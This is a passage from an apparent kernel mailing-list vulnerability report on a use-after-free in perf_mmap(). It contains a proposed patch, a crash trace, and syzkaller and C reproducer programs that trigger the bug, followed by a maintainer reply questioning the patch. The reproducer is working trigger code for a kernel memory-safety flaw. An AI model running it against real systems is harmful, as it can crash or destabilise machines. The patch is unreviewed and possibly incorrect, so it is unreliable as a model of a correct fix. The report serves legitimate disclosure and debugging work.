map_range() after the mmap_mutex is released. If another thread
closes the event or detaches the buffer during this window, the
reference count of rb can drop to zero, leading to a UAF or
refcount saturation when map_range() or subsequent logic attempts
to use it.
Fix this by extending the scope of mmap_mutex to cover the entire
setup process, including map_range(), ensuring the buffer remains
valid until the mapping is complete.
Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com>
---
kernel/events/core.c | 42 +++++++++++++++++++++---------------------
1 file changed, 21 insertions(+), 21 deletions(-)
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 2c35acc2722b..7c93f7d057cb 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
ret = perf_mmap_aux(vma, event, nr_pages);
if (ret)
return ret;
- }
-
- /*
- * Since pinned accounting is per vm we cannot allow fork() to copy our
- * vma.
- */
- vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
- vma->vm_ops = &perf_mmap_vmops;
- mapped = get_mapped(event, event_mapped);
- if (mapped)
- mapped(event, vma->vm_mm);
-
- /*
- * Try to map it into the page table. On fail, invoke
- * perf_mmap_close() to undo the above, as the callsite expects
- * full cleanup in this case and therefore does not invoke
- * vmops::close().
- */
- ret = map_range(event->rb, vma);
- if (ret)
- perf_mmap_close(vma);
+ /*
+ * Since pinned accounting is per vm we cannot allow fork() to copy our
+ * vma.
+ */
+ vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
+ vma->vm_ops = &perf_mmap_vmops;
+
+ mapped = get_mapped(event, event_mapped);
+ if (mapped)
+ mapped(event, vma->vm_mm);
+
+ /*
+ * Try to map it into the page table. On fail, invoke
+ * perf_mmap_close() to undo the above, as the callsite expects
+ * full cleanup in this case and therefore does not invoke
+ * vmops::close().
+ */
+ ret = map_range(event->rb, vma);
+ if (ret)
+ perf_mmap_close(vma);
+ }
return ret;
}
--
2.51.0
Request
-------
Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID.
Best regards,
Haocheng Yu
Zhejiang UniversitySyzkaller hit 'WARNING: refcount bug in perf_mmap' bug.
audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff8881036bf678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c
RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000
RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c
R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000
R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0
FS: 000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0
PKRU: 55555554
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f4a5add3b9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d
RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000
RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0
</TASK>
---[ end trace 0000000000000000 ]---
Syzkaller reproducer:
# {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}}
pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff)
r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8)
mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0)
r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2)
mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0)
C reproducer:
// autogenerated by syzkaller (https://github.com/google/syzkaller)
#define _GNU_SOURCE
#include <endian.h>
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#ifndef __NR_pkey_mprotect
#define __NR_pkey_mprotect 329
#endif
static __thread int clone_ongoing;
static __thread int skip_segv;
static __thread jmp_buf segv_env;
static void segv_handler(int sig, siginfo_t* info, void* ctx)
{
if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) {
exit(sig);
}
uintptr_t addr = (uintptr_t)info->si_addr;
const uintptr_t prog_start = 1 << 20;
const uintptr_t prog_end = 100 << 20;
int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0;
int valid = addr < prog_start || addr > prog_end;
if (skip && valid) {
_longjmp(segv_env, 1);
}
exit(sig);
}
static void install_segv_handler(void)
{
struct sigaction sa;
memset(&sa, 0, sizeof(sa));
sa.sa_handler = SIG_IGN;
syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8);
syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8);
memset(&sa, 0, sizeof(sa));
sa.sa_sigaction = segv_handler;
sa.sa_flags = SA_NODEFER | SA_SIGINFO;
sigaction(SIGSEGV, &sa, NULL);
sigaction(SIGBUS, &sa, NULL);
}
#define NONFAILING(...) \
({ \
int ok = 1; \
__atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \
if (_setjmp(segv_env) == 0) { \
__VA_ARGS__; \
} else \
ok = 0; \
__atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \
ok; \
})
#define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off))
#define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \
*(type*)(addr) = \
htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \
(((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len))))
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
int main(void)
{
syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul,
/*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
const char* reason;
(void)reason;
install_segv_handler();
intptr_t res = 0;
if (write(1, "executing program\n", sizeof("executing program\n") - 1)) {
}
// pkey_mprotect arguments: [
// addr: VMA[0x2000]
// len: len = 0x2000 (8 bytes)
// prot: mmap_prot = 0x5 (8 bytes)
// key: pkey (resource)
// ]
syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul,
/*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x8 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/(intptr_t)-1,
/*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul);
if (res != -1)
r[0] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x0 (8 bytes)
// flags: mmap_flags = 0x11 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x2 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul);
if (res != -1)
r[1] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x100000b (8 bytes)
// flags: mmap_flags = 0x13 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul,
/*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul,
/*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1],
/*offset=*/0ul);
return 0;
}
|
On Sun, Feb 01, 2026 at 07:34:36PM +0800, Haocheng Yu wrote:
This indentation looks very odd, are you sure it is correct?
thanks,
